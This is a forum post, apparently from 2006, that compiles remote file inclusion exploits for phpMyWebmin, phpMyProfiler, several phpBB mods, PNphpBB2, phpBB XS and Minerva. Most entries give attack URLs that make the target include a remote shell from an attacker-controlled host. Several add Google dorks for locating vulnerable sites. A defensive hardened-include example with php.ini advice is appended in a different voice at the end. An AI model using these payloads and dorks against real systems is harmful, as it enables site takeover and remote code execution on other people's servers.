Ashura Unstopable Posts: 370
I can't be arsed to post them all in different topics, so here you go: all I see around with PHP exploits in one place.
Code:
2006-09-30 phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities
Rated as: Critical
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON (turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln. Code:
include("$target/$folder/preferences.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
/change_preferences2.php?target=http://SH3LL?
/create_file.php?target=http://SH3LL?
/upload_local.php?target=http://SH3LL?
/upload_multi.php?target=http://SH3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code:
2006-10-03 phpMyProfiler <= 0.9.6 Remote File Include Vulnerability
Rated as: High Risk
# Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork: phpMyProfiler
http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_script]
PS: Those whitehats on undernet can suck it!!! Lamers boratzi
#phpfreaks rulz
# heh tnx
Code:
2006-10-04 phpBB Static Topics <= 1.0 [phpbb_root_path] File Include Vulnerability
Rated as: High Risk
---------------------------------------------------------------------------
phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include Vulnerability
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpBB Static Topics
Version : 1.0
URL : http://www.nivisec.com/downloads/phpbb/static_forums.zip
------------------------------------------------------------------
Exploit:
~~~~~
Variable $phpbb_root_path not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~
Declare variable $phpbb_root_path
---------------------------------------------------------------------------
Shoutz:
~~~
# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Code:
2006-10-04 phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
Rated as: High Risk
# Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com
#phpfreaks again
# heh tnx
Code:
2006-10-04 phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln
Rated as: High Risk
* SpiderZ Hacking Security *
# Author: SpiderZ
# Admin Topic Action Logging Remote File Inclusion Vulnerability
# Version 0.95 Admin Topic Action Logging
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________
http://site.com/[path]/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://[Evil_script]
-------------------------------------------------------------------------------------
# Download: http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip
# File: 38 KB
-------------------------------------------------------------------------------------
Code:
PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability
Rated as: High Risk
Yeah, another ZeroDay :)
Vendor: http://www.pnphpbb.com/
Vulnerable File: includes/functions_admin.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );
Method To Use:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?
How To Fix: Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
}
Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2
Code:
phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
Rated as: Moderate Risk
Author: AzzCoder
Vendor: http://www.phpbbxs.eu/
Vulnerable File: includes/functions.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
Method To Use:
http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?
Code:
phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability
Rated as: High Risk
###########################################################
#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)
############################################################
#Author: XORON - SHiKaA
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#Code:
include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);
############################################################
#Exploit:
http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?
############################################################
#Greetz: str0ke and AzzCoder ;)
############################################################
Code:
Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
Rated as: High Risk
#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download
#
#Version : All Versions
#
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vuln Code :
#--------------------------------
#
# if ( !empty($setmodules) )
# {
#     include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
#     $module['Forums']['Action_Logging'] = basename(__FILE__);
#     return;
# }
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discovered By : SHiKaA
#
#Contact : SHiKaA-[at]hotmail.com
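Every advisory in this post is the same defect: a phpBB 2 include file concatenates an uninitialised `$phpbb_root_path` into `include()`, so with `register_globals=on` a request parameter becomes the include prefix. The following hardened include is an added example, not code from the post or from any of the quoted projects; `$phpbb_root_path`, `$phpEx` and `IN_PHPBB` are the phpBB 2 names used in the advisories, and the helper `phpbb_safe_root()` is assumed for illustration.

```php
<?php
// Added example: hardened form of the vulnerable include pattern quoted above
//     include_once($phpbb_root_path . 'includes/functions.' . $phpEx);
// Three layers, each of which alone blocks the RFI described in the advisories.

// 1. Refuse direct access. phpBB 2 expects the front controller to define
//    IN_PHPBB before any include runs; this is the fix the PNphpBB2 advisory gives.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Initialise the variable explicitly from this file's location. A value set
//    here is never read from the request, so register_globals becomes irrelevant.
$phpbb_root_path = dirname(__DIR__) . '/';
$phpEx           = 'php';

// 3. Defence in depth: assumed helper that rejects any value which is a URL or
//    PHP stream wrapper, or which resolves outside the application root.
function phpbb_safe_root(string $candidate, string $approot): string
{
    // A scheme prefix (http://, ftp://, php://, data:, ...) is exactly what the
    // ?phpbb_root_path=http://... payloads rely on; reject it outright.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        throw new RuntimeException('remote or stream path rejected');
    }
    $real = realpath($candidate);
    $base = realpath($approot);
    // The resolved directory must exist and stay inside the application root
    // (the trailing slash stops /var/www/app2 matching /var/www/app).
    if ($real === false || $base === false
        || strncmp($real . '/', $base . '/', strlen($base) + 1) !== 0) {
        throw new RuntimeException('path outside application root rejected');
    }
    return $real . '/';
}

$phpbb_root_path = phpbb_safe_root($phpbb_root_path, dirname(__DIR__));

include_once($phpbb_root_path . 'includes/functions.' . $phpEx);
```

At the interpreter level, `register_globals=off` removes the injection path entirely and `allow_url_include=Off` (PHP 5.2 and later) makes `include()` of an `http://` target fail regardless of application code; both belong in php.ini alongside the code fix.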
|